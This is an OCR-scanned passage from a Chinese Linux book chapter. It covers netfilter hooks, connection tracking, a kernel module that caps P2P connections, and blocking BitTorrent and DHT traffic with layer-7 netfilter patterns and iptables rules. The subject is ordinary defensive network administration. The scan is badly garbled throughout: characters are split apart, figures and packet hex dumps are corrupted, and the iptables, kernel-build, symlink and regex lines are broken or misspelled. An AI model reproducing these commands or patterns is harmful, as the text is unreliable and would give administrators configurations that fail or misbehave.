它 按照 priority 的 值 由 小 到 大 链接 在 一 起 的 , nf_ hook _slow0O 函 数 依靠 遍历 这 个 表 来 调用 该 检查 
点 的 钧 子 函 数 。hook 是 指向 nf hookfn 函数 的 指针 ， 也 就 是 这 个 钩子 将 要 调用 的 所 有 函数 。 
nf_hookfn 同样 定义 在 linux/netfilter.h 文件 中 。pf 字段 指定 了 协议 簇 (Protocol Family) ， 
linux/socket.h 中 定义 了 可 用 的 协议 位。 对 于 IPv4 而 言 ， 只 使 用 PF_INET。hooknum 域 指明 了 
为 哪个 检查 点 安装 这 个 函数 ， 即 表 11.1 中 所 列 出 的 条 目 中 的 一 个 。priority 域 表 示 在 运行 时 这 
个 钧 子 函数 执行 的 顺序 ,我 们 选择 NF_IP_PRI FIRST 这 个 最 高 优先 级 来 运行 编写 的 内 核 模块 。 


11.1.2” 连 线 跟 踪 


1. 什么 是 连 线 跟踪 


每 个 网 络 连接 包括 以 下 信息 : 源 地 址 、 目 的 地 址 、 源 端口 、 目 的 端口 、 套 接 字 对 (Socket 
Pairs)、 协 议 类 型 、 连 接 状 态 (TCP 协议 ) 和 超时 时 间 等 .防火 墙 把 这 些 信息 称 为 状态 (Statefu1)， 
能 够 检测 每 个 连接 状态 的 防火 墙 称 为 状态 包 过 滤 防 火 墙 . 连 线 跟踪 除了 能 够 完成 简单 包 过 滤 防 
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火 墙 的 包 过 滤 工作 外 , 还 在 自己 的 内 存 中 维护 一 个 跟踪 连接 状态 的 表 , 比 简单 包 过 滤 防 火 墙 具 
有 更 强 的 安全 性 。 

以 前 ， 经 常 需要 打开 1024 以 上 的 所 有 端口 来 放行 应 答 的 数据 。 现 在 有 了 连 线 跟踪 ， 就 不 
再 需要 这 样 做 了 ,因为 可 以 只 开放 那些 有 应 答 数 据 的 端口 ， 其 他 的 都 可 以 关闭 ,这 样 就 安全 多 
了 。 


2. 连 线 跟踪 的 工作 原理 


连 线 跟踪 的 工作 原理 并 不 十 分 复杂 , 以 一 个 防火 墙 接收 到 一 个 初始 化 TCP 连接 的 SYN 包 
为 例 ， 这 个 带 有 SYN 的 网 络 协 议 包 将 被 防火 墙 的 规则 库 检 查 。 

该 数据 包 将 在 规则 库 中 依次 序 进行 比较 。 如 果 检 查 所 有 的 规则 都 不 匹配 , 那么 该 包 将 被 丢 
弃 。 这 样 一 个 含 连 接 复位 (RST) 的 网 络 协议 包 ， 将 被 发 送 到 远 端 的 主机 。 要 是 该 数据 包 通 过 
防火 墙 的 规则 检查 被 防火 墙 接收 , 那么 这 次 连接 的 信息 将 被 保存 在 一 个 连 线 跟踪 信息 表 中 , 并 
表明 该 包 所 应 有 的 状态 。 这 个 连 线 跟踪 信息 表 位 于 内 核 模式 下 ,其 后 的 网 络 协 议 包 (也 就 是 在 
SYN 包 之 后 不 带 SYN 标志 的 数据 包 ) 就 将 与 此 连 线 跟踪 信息 表 中 的 内 容 进 行 比较 。 

根据 信息 表 中 该 包 的 信息 来 决定 该 数据 包 是 丢弃 还 是 被 接收 利用 连 线 跟踪 可 以 提高 防火 
墙 系统 的 性 能 , 因为 每 一 个 数据 包 首先 不 是 和 规则 库 进行 比较 , 而 是 和 连 线 跟踪 信息 表 进 行 比 
较 。 只 有 含有 SYN 的 数据 包 到 来 时 ， 它 才 和 规则 库 进 行 比较 。 因 为 所 有 的 数据 包 与 连 线 跟踪 
信息 表 的 比较 都 是 在 内 核 模式 下 进行 的 ， 所 以 速度 很 快 。 

可 见 连 线 跟踪 的 工作 原理 是 : 检测 每 一 个 有 效 连 接 的 状态 , 并 根据 这 些 信 息 决定 网 络 数据 
包 是 否 能 够 通过 防火 墙 。 该 技术 在 协议 栈 底层 截取 数据 包 ， 然 后 分 析 这 些 数 据 包 。 并 且 ， 将 当 
前 数据 包 及 其 状态 信息 和 前 一 时 刻 的 数据 包 及 其 状态 信息 进行 比较 , 从 而 得 到 该 数据 包 的 控制 
信息 ， 达 到 保护 网 络 安全 的 目的 。 


3. UDP 协议 的 连 线 跟踪 


UDP 协议 的 连接 是 无 状态 的 , 但 仍然 可 以 用 类 似 的 方法 来 维护 这 些 连接 。 当 一 个 UDP 包 
通过 防火 墙 的 规则 检查 时 ， 这 次 连接 也 将 被 添加 到 连 线 跟踪 信息 表 中 ， 并 如 同 TCP 一 样 设置 
一 个 连接 的 超时 时 间 值 。 在 这 个 时 间 值 内 ， 返 回 的 任何 一 个 源 地 址 、 目 的 地 址 ， 以 及 源 端口 、 
目的 端口 相 匹配 的 数据 包 都 将 被 允许 通过 。 


4. 包 处 理 过 程 
数据 包 进 入 系统 后 ， 在 前 面 的 图 11.1 中 ， 可 以 看 到 有 3 种 可 能 的 流程 。 


@ 发 往 本 机 上 层 的 包 (INPUT 链 ): NF IP PRE ROUTING 一 NF IP_ LOCAL IN. 主机 
接收 到 发 往 本 地 的 IP 数据 包 后 ， 首 先 经 过 NF_ IP PRE ROUTING， 系 统 做 出 路 由 决 
定 ， 决定 把 该 数据 包 发 往 本 地 ， 数据 包 经 过 NF IP LOCAL IN 后 被 应 用 程序 所 接收 。 

@ 由 本 机 转发 的 包 (FORWARD 链 ): NF IP PRE ROUTING 一 NF IP FORWARD ~ 
NF_IP_ POST ROUTING-NF IP FORWARD 一 NF IP_ POST ROUTING. 主机 接收 到 
需要 它 转 发 的 数据 包 后 ， 首 先 经 过 NF_IP PRE ROUTING， 如 果 没 有 任何 钩子 函数 的 


Linux ”企业 应 用 案例 精 解 


话 ， 系 统 将 做 出 路 由 决定 ， 决 定 该 数据 包 的 走向 。 然 后 数据 包 会 经 过 
NF IP FORWARD、NF IP POST ROUTING， 离 开 系 统 并 被 发 送 到 网 络 上 . 

@ 从 本 机 发 出 的 包 (OUTPUT 链 ): NF IP LOCAL OUT 一 NF IP_ POST ROUTING.。 当 
本 地 产生 数据 包 时 ， 该 数据 包 首 先 经 过 NF IP LOCAL OUT， 数 据 包 经 过 
NF_IP_ POST ROUTING 后 被 转发 到 网 络 中 。 


在 每 一 条 路 径 上 , 连 线 跟踪 、 包 过 滤 和 地 址 转换 都 注册 了 相应 的 函数 ， 并 创建 与 之 相关 的 
数据 结构 ， 完 成 其 功能 。 每 条 路 径 上 功能 点 的 顺序 如 图 11.2 所 示 。 


CONNTRACK DNAT FILTER | SNAT CONNTRACK 


图 11.2 ”路径 功能 顺序 


在 图 11.2 中 ，CONNTRACK 代表 连 线 跟踪 ，DNAT 代表 目的 地 址 转换 ，SNAT、 代 表 源 地 
址 转换 ，FILTER 代表 包 过 滤 。 可 以 看 到 ，CONNTRACK 在 路 径 上 出 现 了 两 次 ， 其 作用 是 : 在 
第 一 个 点 上 创建 连 线 跟踪 的 结构 ， 这 个 结构 会 在 后 面 的 地 址 转换 和 包 过 滤 中 被 使 用 ， 在 第 二 个 
点 上 将 连 线 跟踪 的 结构 加 到 系统 的 连接 表 中 。 通 过 查看 ip_conntrack_core.c 的 源 代码 发 现 
印 conntrack hash 这 一 双向 链表 是 可 供 外 部 访问 的 ， 这 为 后 面 编写 内 核 代码 读 取 该 表 中 的 数据 
以 获取 所 要 的 信息 提供 了 可 能 。 


5. 限制 P2P 连接 数 内 核 模块 


由 于 Linux 源 代码 的 开放 与 自由 , 用 户 可 以 通过 编写 内 核 模 块 装载 到 内 核 中 , 利用 netfilter 
的 钧 子 来 达到 任何 目的 ,由 于 P2P 连接 都 是 TCP 或 者 UDP 连接 ,因此 将 利用 连 线 跟踪 里 的 “ 状 
态 ” 这 一 概念 来 进行 内 核 模块 的 编写 ， 在 数据 包 进 来 时 先 遍 历 内 存 中 的 连 线 跟 踪 表 ， 查 看 里 
面 的 了 有 多 少 已 建立 的 连接 ， 若 已 达到 所 限制 的 数目 ， 则 把 刚 进来 的 数据 包 丢掉 ， 从 而 实现 
连接 数 的 限制 。 

不 妨 假设 一 个 简单 的 网 络 拓扑 图 ， 如 图 11.3 所 示 。 

该 Linux 服务 器 已 通过 iptables 工具 配置 好 了 NAT 以 及 一 些 访问 策略 等 ， 这 里 说 明 一 下 
FORWARD 链 的 配置 ， 该 链 至 少 要 有 如 下 配置 : 


#iptables -t nat -a POSTROUTING -o eth0 -s 192.168.0.0/16 -j MASQUERADE 
#iptables -a FORWARD -i eth0 -m state --state ESTABLISHED RELATED -j ACCEPT 
#iptables -a FORWARD -s 192.168.0.0/16 -j ACCEPT 

#iptables -a FORWARD -]j ACCEPT 
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eth0 eth1 
202.119-230.100 Ppp 
Linux 
Internet GQ 
< 
LAN 
图 11.3 网 络 拓扑 图 
其 模块 流程 图 如 图 11.4 所 示 。 
包 进 入 


种 据 "kbuf 区 着 
考 线 织 啼 信 息 


道 历 连 线 跟 除 hash 表 获 
得 该 歼 己 建 立 连 污 个 数 


返回 NF_ACCEPT 


运 回 NF_DROP 


11.4 ”模块 流程 图 


其 主要 代码 如 下 : 
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nf register hook(gnfho); 
return 0; 
} 
/* 模 块 卸载 函数 */ 
void limitp2p_cleanup module() 
{ 
/* 向 netfilter 框架 取消 钩子 函数 登记 */ 
nf unregister hook(&nfho) 7 
) 
module init(limitp2p init module); 


module exit(limitp2p cleanup module); 


本 内 核 模块 在 Linux 2.6 内 核 下 通过 编译 并 能 正常 工作 ，Linux 提供 的 基于 内 核 的 netfilter 
框架 具有 通用 性 和 可 扩展 性 的 特点 ,使 得 开发 人 员 可 结合 自己 的 需要 编写 内 核 模块 来 对 数据 包 
进行 处 理 。 前 文 所 述 模块 只 是 实现 了 很 简单 的 功能 , 完全 可 以 对 其 进行 扩充 , 例如 加 上 检测 的 
端口 等 , 或 者 与 iptables 相 结 合 ， 这 样 就 可 以 在 用 户 空间 通过 iptables 的 参数 来 配置 该 模块 了 。 


11.2 ”基于 Linux 的 iptables/netfilter 限制 BT 下 载 案例 分 析 


在 BT 应 用 频繁 的 今天 ,如 何 有 效 控制 BT 下载 已 经 成 为 网 络 管理 员 吸 需 解 决 的 问题 ,Cisco 
3560 系列 交换 机 利用 Classifier 从 硬件 过 滤 禁 止 BT 下 载 ， 而 笔者 在 本 节 将 介绍 利用 Linux 系 
统 下 的 应 用 层 netfilter 限制 BT 下 载 。 为 了 使 应 用 层 netfilter 识别 并 封锁 经 过 防火 墙 的 BT 数 
据 流 ， 首 先 需 要 对 BT 协议 的 运作 有 充分 的 了 解 。 


11.2.1 禁止 基于 标准 协议 的 BT 下 载 


一 次 常规 的 BT 下 载 要 经 历 一 系列 的 过 程 。 首 先 需要 得 到 相应 的 -torrent 文件 ， 也 就 是 BT 种 
子 文件 ， 然 后 使 用 BT 客户 端 软件 进行 下 载 。BT 客户 端 首先 解析 :torrent 文件 得 到 Tracker 地 址 ， 
然后 连接 Tracker 服务 器 。Tracker 服务 器 回应 下 载 者 的 请 求 ， 提 供 其 他 下 载 者 (包括 发 布 者 ) 的 
信息 列表 。 下 载 者 再 据 此 连接 其 他 下 载 者 ， 根 据 .torrent 文件 ， 双 方 分 别 告知 对 方 已 有 的 块 ， 然 后 
下 载 者 之 间 通 过 直接 连接 进行 数据 的 上 传 和 下 载 ， 交 换 对 方 没有 的 数据 。 在 上 述 过 程 中 ， 下 载 者 
和 Tracker 服务 器 的 交互 是 通过 HTTP 协议 完成 的 ， 而 且 在 下 载 过程 中 ， 下 载 者 需要 周期 性 地 向 
Tracker 登记 , 以 便 Tracker 能 了 解 下 载 者 的 进度 。 下 载 者 之 间 的 连接 是 通过 基于 TCP 的 BitTorrent 
对 等 协议 完成 的 。 

通过 分 析 上 述 过 程 ， 要 禁止 这 种 BT 下 载 可 以 从 两 个 方面 着 手 进 行 ， 下 面 进行 详细 介绍 。 
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11.2.2 ”禁止 下 载 者 和 Tracker 服务 器 之 间 的 交互 
这 种 禁止 一 般 可 以 采取 如 下 两 种 方法 。 


(1) 禁止 用 户 访问 Tracker。 要 实现 这 个 目标 ， 需 要 完全 了 解 当前 所 有 Tracker 服务 器 的 
地 址 ， 禁 止 用 户 访问 这 些 服务 器 ， 但 这 是 不 现实 的 。 因 为 Tracker 服务 器 是 不 确定 的 ， 甚 至 每 
个 种 子 文件 中 的 Tracker 地 址 都 不 相同 ， 即 使 能 够 知道 当前 互联 网 上 主要 的 Tracker 服务 器 地 
址 ， 也 不 能 完全 保证 禁止 所 有 的 Tracker 服务 器 ， 只 要 有 一 个 可 用 的 Tracker 服务 器 ，BT 下 载 
者 就 有 可 能 找到 其 他 的 下 载 者， 开始 下 载 和 上 传 ， 所 以 这 个 办 法 是 不 可 行 的 。 

(2) 分 析 HTTP 应 用 层 ， 识 别 出 BT 和 HTTP 交互 过 程 中 的 某 些 关键 字段 来 禁止 连接 
Tracker 服务 器 。 但 这 种 关键 字段 是 难以 确定 的 ， 如 使 用 BT 客户 端 软件 在 HTTP 请 求 报 文 携 
带 的 User-Agent:BitTorrent 信息 来 识别 ， 随 着 BT 客户 端 软件 的 发 展 ， 目 前 主流 的 BT 客户 端 
软件 都 可 以 随意 修改 该 字段 信息 。 还 有 一 点 需要 说 明 的 是 ， 现 在 已 经 出 现 了 Bittorrent 
udp-tracker 协议 , 该 协议 作为 原来 下 载 者 和 Tracker 服务 器 使 用 HTTP 交互 的 补充 或 替代 出 现 。 
目前 有 很 多 支持 UDP、Tracker 的 Tracker 服务 器 出 现 , 主流 的 BT 客户 端 软件 也 均 支 持 该 协议 ， 
但 只 做 HITP 应 用 分 析 是 不 够 的 ， 所 以 这 种 方法 也 是 不 可 行 的 。 


11.2.3 ”禁止 下 载 者 之 间 连 接 
这 种 禁止 一 般 也 有 如 下 两 种 方法 。 


(1) 依据 识别 BT 使 用 端口 禁止 连接 。 由 于 BT 客户 端 软件 均 可 以 随意 更 改 监听 端口 ， 
甚至 使 用 随机 端口 ， 所 以 该 方法 是 不 可 行 的 。 

(2) 依据 BT 对 等 协议 特征 码 来 识别 ， 禁 止 连接 。BT 对 等 协议 由 一 个 握手 消息 开始 ， 消 息 
中 首先 是 字符 “19”， 然 后 是 字符 串 “BitTorentprotocol”， 其 中 19 是 握手 消息 的 长 度 ， 如 图 11.5 
所 示 。 


0000: |00 ol 30 BB 15 40 00 09 63 50 F3 39 08 00 45 00 00 5C 16 93 40 00 30 06 AB | 
0025: BE9 DA EA B2 34 DA CE 38 OB 2C 49 A4 hg 1D 00 OF B7 37 63 38 50 19 3 了 FF 
0050; |85 51 00 00 上 EE2 54 67 72 72 65 58 74 20 70 72 67 74 68 63 6F 6C 65 
0075: 0 
70 2p 42 43 30 
0125: |00 


NP 
Op 


图 11.5 BT 对 等 协议 特征 码 


握手 消息 中 包括 的 这 些 字 符 串 是 始终 不 变 的 , 而 且 下 载 者 之 间 必 须 完 成 握手 , 才能 开始 后 
续 信 息 流 的 交互 。 只 要 能 够 识别 这 个 字符 串 ， 就 能 识别 禁止 握手 信息 ， 从 而 实现 禁止 下 载 者 之 
间 完 成 连接 ， 彻 底 禁止 下 载 ， 因 此 这 个 方法 是 可 行 的 。 


11.2.4 ”禁止 基于 非 标准 协议 的 BT 下 载 

禁止 了 BitTorent 协议 实现 的 标准 过 程 下 载 ， 还 不 能 完全 禁止 现今 各 种 BT 客户 端 软件 的 
BT 下 载 。 管 理 员 在 封 堵 BT 下 载 的 同时 ， 各 种 BT 客户 端 软 件 也 在 不 断 发 展 ， 已 经 有 多 种 方 
法 可 以 突破 上 文 提 到 的 基于 对 等 协议 握手 信息 特征 码 封 堵 的 方法 。 
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以 新 版 本 的 BT 客户 端 软件 BitComet 和 BitSpirit 为 例 ， 图 11.6 所 示 为 BT 客户 端 软件 
BitSpirit 3.x 版 本 的 设置 界面 。 


移 先 启用 内 竟 的 5 
什么 是 内 网 开 联 ee 
失误 里 1 就 重 处 在 同一 个 网 内 一 样 。 这 个 功 
站 中 运作 良好 和 并 银 好 的 提高 下 载 速度 。 
回 扩展 握手 协议 5 该 ACLFDUM 等 复 6T 的 可 以 这 ， 否 则 千 万 不 要 选 * ) ， 


图 11.6 BT 客户 端 软件 设置 界面 


面 对 使 用 了 这 些 技术 的 BT 客户 端 ， 是 不 是 就 没有 办 法 封 堵 了 呢 ? 在 使 用 了 这 些 突 破 封 
堵 方 法 后 ， 在 实际 应 用 中 有 一 个 重要 的 特点 就 是 BitSpirit 客户 只 能 够 连接 BitSpirit 客户 ， 
BitComet 客户 只 能 够 连接 BitComet 客户 ， 不 同 客户 端 软件 不 能 够 互联 ， 极 大 减少 了 源 下 载 和 
上 传 点 数量 ， 也 降低 了 下 载 和 上 传 速率 。 这 一 点 实际 上 说 明了 这 些 方法 、 协 议 一 般 是 某 一 BT 
客户 端 软件 所 私有 的 , 只 要 进行 有 效 的 协议 分 析 , 仍然 可 以 找到 相应 的 特征 码 , 从 而 完成 封 堵 。 
目前 能 够 突破 BitTorrent 对 等 协议 握手 信息 特征 码 封 堵 的 方法 主要 有 两 种 ， 笔 者 分 别 以 BT 客 
户 端 软件 BitComet V0.97 和 BitSpirit V3.3.2 为 例 进 行 分 析 。 


1. 基于 UDPNAT 穿越 的 内 网 互联 


使 用 内 网 互联 功能 ，BT 下 载 者 首先 需要 UDP 连接 到 一 个 内 网 互联 服务 器 ， 在 内 网 互联 
服务 器 的 帮助 下 ， 使 用 UDP 协议 连接 其 他 下 载 者 。 如 果 连 接 成 功 ， 在 下 载 者 之 间 则 可 以 通过 
UDP 下 载 和 上 传 文件 ， 而 且 可 以 不 受 FireWall/NAT 设备 的 限制 ， 可 以 发 起 连接 或 被 连接 。 由 
于 这 种 下 载 者 之 间 的 连接 是 基于 UDP 协议 的 , 完全 没有 上 文 提 到 的 TCP 握手 过 程 ， 因此 需要 
使 用 新 的 方法 封 堵 。 

内 网 互联 服务 器 其 实 是 一 个 中 介 ， 也 是 一 个 关键 。 如 果 不 能 连接 内 网 互联 服务 器 , 客户 端 
之 间 就 不 能 完成 UDP 连接 。 这 个 内 网 互联 服务 器 是 各 种 BT 客户 端 软 件 提供 的 ，BitComet 只 
能 连接 BitComet 提供 的 内 网 服务 器 ， 而 BitSpirit 只 能 连接 BitSpirit 提供 的 内 网 互联 服务 器 ， 
这 也 是 只 有 相同 客户 端 软 件 才能 互联 的 一 个 原因 。 只 要 知道 内 网 互联 服务 器 的 了 P 地 址 ， 就 可 
以 完成 这 一 步 的 封 堵 。 但 是 笔者 并 不 推荐 这 样 的 方法 ， 主 要 原因 是 这 些 内 网 互联 服务 器 的 他 
地 址 可 能 是 不 确定 的 ，BT 客户 端 软件 可 通过 域名 找到 这 些 服务 器 ， 要 更 改 这 些 地 址 很 容易 ， 
不 能 完全 保证 封 堵 效果 ， 仍 然 需要 通过 抓 包 来 找到 这 些 UDP 流量 中 的 特征 码 ， 以 完成 封 堵 。 
BitComet 传输 过 程 中 抓 取 的 UDP 报 文 ， 如 图 11.7 所 示 。 
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0000:|o0 00 cp OF FA 03 00 03 6B 60 73 39 03 00 45 00 00 52 
O025: AD OA OC O01 6B DA 50 4D 7E 47 B3 zC BE 00 3E 22 9 DO 
0050: 52 35 24 DF 48 81 OA AC 00 00 00 00 00 02 00 00 00 00 
0075: 4 00 00 00 0L 00 00 00 00 O01 BA 00 00 00 00 00 00 00 


图 11.7 BitComet 传输 过 程 中 抓 取 的 UDP 报 文 


由 此 可 以 发 现 ，BitComet 在 下 载 者 之 间 的 UDP 传输 报 文中 ， 均 包括 “08 27 37 50 29 52” 
的 首部 ,如果 识别 这 些 字段 ， 就 可 以 禁止 这 些 数据 包 通 过 netfilter, 完全 禁止 BitComet 的 UDP 
下 载 。 在 应 用 层 netfilter 中 可 以 创建 “ (\x08`7P\) ”模式 来 匹配 该 数据 包 。 图 11.8 是 BitSpirit 
在 传输 过 程 中 抓 取 的 一 个 UDP 报 文 , BitSpirit 在 本 地 回应 远 端 用 户 UDP 报 文 均 包 括 “00 00 00 
40” 的 首部 ， 如 果 识 别 这 些 字段 ， 就 可 以 禁止 这 些 数据 包 通 过 netfilter， 完 全 禁止 BitSpirit 
的 UDP 下 载 。 在 应 用 层 netfilter 中 可 以 创建 “\x00\x00x00@” 人 
0000: 
0025: 


00755 
O100: 


00 09 68 60 F3 39 00 00 cp OF 27 €9 03 00 45 00 00 5C OC CC 00 00 6C 11 7F | ..8 .9. 
OA 3B 38 7B PE OA OC 01 B81 27 10 ?0 24 00 48 2C 34 O0000040 DB Cp rz ee 
:00 sgA FE CS 00 00 00 02 80 O01 00 01 07 DD SB 55 3D 6h D8 SC 55 44 S50 30 00 
00 og0 00 00 90 00 00 o0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  » 
voo og oo oo oo 00 00 00 


图 11.8 BitSpirt 传输 过 程 中 抓 取 的 UDP 报 文 


2. 扩展 握手 协议 或 协议 头 加 密 


BitSpirit 有 一 个 “扩展 握手 协议 ”选项 ， 该 功能 的 引入 主要 是 为 了 防止 基于 对 等 协议 握手 
信息 特征 码 的 封 堵 方 法 。BitSpirit 的 实现 是 在 下 载 者 之 间 的 TCP 握手 信息 前 加 入 一 个 HTTP 
包头 ，BitComet 则 是 将 握手 信息 加 密 扰乱 。 这 两 种 方法 可 以 有 效 地 突破 基于 对 等 协议 握手 信 
息 特征 码 的 封 堵 , 但 由 于 使 用 相对 较 少 , 而 且 局 限于 同一 种 客户 端 软件 之 间 才 能 互联 ， 启用 该 
选项 后 ， 下 载 源 很 少 ， 下 载 速度 可 能 会 比较 慢 。 这 种 方法 仍然 是 需要 BT 和 TCP 握手 过 程 的 ， 
但 由 于 扩展 和 加 密 ， 已 经 无 法 识别 BitTorrent Protocol 特征 码 ， 因 此 需要 寻找 其 他 的 特征 码 。 
在 BitComet 和 BitSpirit 的 TCP 下 载 和 上 传 中 ， 均 可 以 抓 取 数据 包 ， 如 图 11.9 所 示 。 


0000:|00 09 6B 60 F3 39 00 00 CD OF FA 08 08 00 45 00 05 A6 B6 E6 40 00 6A 06 45 | ..k .9. 
0025:|c7 D2 1A 31 OB OA OC 01 6B 44 07 04 DD $C 39 45 19 C3 Ch 96 03 SO 10 FC 28 
00s0: |35 op 00 00 B00040 07 00 00 00 67 00 00 00 00 Oc 9D 20 sE 3 yp C2 3B 
0075: 50 BD C4 75 97 92 3A 3C 60 BD 09 2E DC CS DL AF AS 4B 24 39 SF 4C 05 06 
O100: 49 BA FE 83 17 A9 €3 F1 96 90 81 DB CE E3 CA Fl CO EG FE BA 50 19 CB CD DE 


图 11.9 ”传输 过 程 中 抓 取 的 TCP 报 文 


该 数据 包 TCP 负载 首部 包括 字段 “40 09 07 00”， 具 有 该 首部 的 数据 包 一 般 是 传输 一 块 
数据 的 第 一 个 数据 包 ， 如 果 识 别 这 些 字段 ， 就 可 以 禁止 这 些 数据 包 通 过 netfilter。 在 禁止 这 些 
数据 包 传 输 后 ,可 以 发 现 只 有 零星 速率 极 低 的 数据 上 传 和 下 载 。 在 这 种 情况 下 ， 下 载 虽然 不 能 
完全 禁止 , 但 下 载 量 极 少 , 已 经 达到 封 堵 效果 。 在 应 用 层 netfilter 中 可 以 创建 “@\X09\X07x00” 
模式 来 匹配 该 数据 包 。 


11.2.5 禁止 BT 客户 端 加 入 DHT 网 络 


目前 BT 客户 端 均 开始 支持 最 新 基于 Kademlia 技术 的 公有 DHT 网 络 。DHT 全 称 为 分 布 
式 哈 希 表 (Distributed Hash Table) ， 是 一 种 分 布 式 存储 方法 。 在 不 需要 Tracker 服务 器 的 情况 
下 ， 每 个 BT 客户 端 负责 一 个 小 范围 的 路 由 ， 并 负责 存储 一 小 部 分 数据 ， 从 而 实现 整个 DHT 
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网 络 的 寻 址 和 存储 。 使 用 支持 该 技术 的 BT 客户 端 软件 ， 用 户 无 须 连 上 Tracker 就 可 以 开始 下 
载 ， 因 为 软件 会 在 DHT 网 络 中 寻找 下 载 同一 文件 的 其 他 用 户 ， 并 与 之 通信 ， 开 始 下 载 任务 。 
DHT 网 络 技术 使 得 无 Tracker 下 载 成 为 可 能 ， 控 制 访问 Tracker 服务 器 来 控制 BT 下 载 更 是 无 
法 实现 。DHT 网 络 并 不 是 一 种 BT 客户 端 突破 封 堵 的 方法 ， 而 是 一 种 新 型 P2P 文件 分 享 搜索 
方法 。BitComet 和 BitSpirit 均 支 持 该 协议 ， 而 且 也 是 完全 兼容 BitTorrent 的 DHT 实现 。 在 协 
议 分 析 软 件 中 可 以 看 到 ，BitComet 和 BitSpirit 在 启动 或 开始 一 个 下 载 任务 之 前 均 会 发 出 大 量 
DHT 数据 包 ， 用 于 搜索 连接 其 他 DHT 客户 ， 数 据 包 内 容 如 图 11.10 所 示 。 这 些 数据 包 均 是 基 
于 UDP 的 ， 而 且 UDP 负载 的 头 部 有 完全 相同 的 字符 串 “dl: ad2: id20: 6”， 只 需要 识别 这 
些 字符 串 ， 就 可 以 禁止 这 些 数 据 包 通 过 netfilter， 完 全 可 以 禁止 BT 客户 端 加 入 DHT 网 络 ， 
BitComet 和 BitSpirit 的 DHT 功能 也 将 失效 。 在 应 用 层 netfilter 中 可 以 创建 “dl1: ad2: id20: 
6” 模 式 来 匹配 该 数据 包 。 


0o0oxsjoo 00 cD oF 54 08 00 09 5B 650 F3 33 08 00 45 00 00 7 
D027: OC 01 EB 44 zh SB ?8 7C Ap 26 6D 00 eh 86 91 ES 
0054: 36 ZN 42 D7 DB CE 45 53 97 9F 12 E3 CS 7K 5L 1B 43 70 
D0081: 34 32 30 3K 35 00 00 00 35 00 00 00 35 00 00 00 35 00 
D103: 71 39 3A 66 69 6E 64 SF 6B EF 64 55 31 3k 74 38 3A BA 1 


图 11.10 DHT 数据 包 内 容 


1. 应 用 层 netfilter 的 安装 与 配置 


以 Red Hat 9.0 为 例 , 介绍 Linux 下 应 用 层 netfilter 的 安装 与 配置 , 所 需要 的 基本 环境 及 软 
件 包括 Red Hat 9.0 (Kernel 2.4.20-8) 、 最 新 的 iptables-1.3.5.tar.bz2、 匹 配 数 据 包 正则 表达 式 
的 17-protocols-2007-12.tar.gz、 向 内核 加 载 netfilter 所 需要 的 包 netfilter-layer7-v2.1.tar.gz， 以 及 
Linux 内 核 文件 Linux-2.4.32.tar.bz2 等 , 所 有 这 些 软 件 包 均 可 在 ftp.bdcf.net 的 FireWall 目录 中 
找到 。 


2. 编译 内 核 


将 iptables-1.3.5.tar.bz2、netfilter-layer7-v2.1.tar.gz 和 Linux-2.4.32.tar.bz2 三 个 包 放 在 usr/src/ 
下 解压 ， 并 做 连接 : 


#tar xvjf iptables-1.3.5.tar.gz2 

#tar zxvf iptables-layer7-v2.1.tar.gz 
#tar zxjf Linux-2.4.32.tar.gz2 

#in -=s kernel-2.4.32 linux 

#1ln -s iptables-1.3.5 iptables 


为 内 核 和 iptables 打 补 丁 : 


#cd /usr/src/linux 

#patch -pl<../netfilter-layer7-v2.1/kernel-2.4-layer7-2.1.path 
#cd /usr/src/iptables 

#patch -pl<../netfilter-layer7-v2.1/iptables-layer7-2.1.patch 
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编译 内 核 ， 清 除 以 前 编译 内 核 留 下 的 痕迹 ， 如 果 是 新 的 内 核 文 件 ， 则 可 以 略 过 : 
#make mrproper 
在 现 有 内 核 模块 上 添加 新 的 功能 模块 应 用 层 : 


#make menuconfig 

network options-— IP:netfilter configuration-™ 
<M > Laye r7 m atch Support (EXPERIMENTAL) 

<*> Laer7 debugging output (EXPERIMENTAL) 


保存 以 后 开始 编译 内 核 : 


#make dep&&make clean&&make bzIm ageg&& make modulesgg& make 
Modules installggmake install 


检查 grub/grub.conf 文件 是 否 被 更 新 : 


#more / boot / grub / grub. conf 


3. 安装 新 的 iptables 
重新 启动 计算 机 ， 进 入 新 编译 的 内 核 启 动 系 统 ， 安 装 新 的 iptables: 


#cd /usr/src/iptables 

#make KERNEL DIR=/usr/src/linux 

#make install KERNEL DIR=/usr/src/linux 
#cp /usr/sinb/iptables /sbin 

#iptables -V 


4. 安装 17-protocols 

在 17-protocols-2007-02-12 下 执行 make install 进行 安装 ， 也 可 以 直接 把 
I7-protocols-2007-02-12 下 的 所 有 pat 文件 复制 到 /etc/17-protocols 下 完成 安装 。 

5. 测试 


编辑 /etc/17-protocols/bittorrent.pat 文件 ， 修 改 匹配 行 如 下 ， 这 样 所 有 与 匹配 文件 相 匹 配 的 
协议 传输 的 数据 报 将 被 丢弃 : 


^(\x13 BitTorrent protocol1\x08`7P\)Q\x09N\x07\x0018@x09\x07\x001dl:ad2: 
1d20:6) 
iptables-tmangle-A PoSTROUTING -m ayer7-17protobittorrentdj DROP 


以 上 均 测 试 通过 ， 只 有 geoip 的 geoipdb.bin 没 下载 到 ， 所 以 没有 测试 ， 更 多 的 应 用 ， 要 根 
据 自己 的 需要 来 组 合 各 个 规则 和 模块 ， 用 iptables -nL 查看 ipp2p 已 经 生效 。 
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11.2.6 ”小结 


Linux 中 实现 包 过 滤 功 能 的 第 四 代 应 用 程序 netfilter 包含 在 2.4 以 后 的 内 核 中 ， 它 实现 了 
防火 墙 、NAT 《网络 地 址 转换 》 和 数据 包 的 分 割 等 功能 ， 经 过 试验 ， 完 全 满足 我 们 限制 BT、 
节省 带宽 的 目的 。 


11.3 ”基于 iptables 的 Web 认证 系统 的 实现 


11.3.1 引言 


随 着 Internet 的 迅速 发 展 ， 宽 带 网 络 的 接 入 日 益 增 多 ，Internet 用 户 的 数量 也 迅速 膨胀 。 尤 
其 是 高 校 中 的 网 络 接 入 数量 也 快速 增加 ， 学 校 中 网 络 管理 人 员 面 临 着 IP 地 址 缺乏 、 用 户 访问 
认证 、 二 级 单位 上 网 管理 以 及 内 部 网 络 安全 等 一 系列 问题 。 另 外， 公安 部 门 要 求 对 上 网 用 户 进 
行 身份 认证 和 上 网 记录 保存 的 问题 ， 对 网 管 人 员 提 出 了 严格 的 要 求 。Linux 操作 系统 的 稳定 安 
全 和 网 络 性 能 优异 等 特色 ， 使 其 成 为 广大 网 管 人 员 解 决 上 述 问题 的 首选 。 
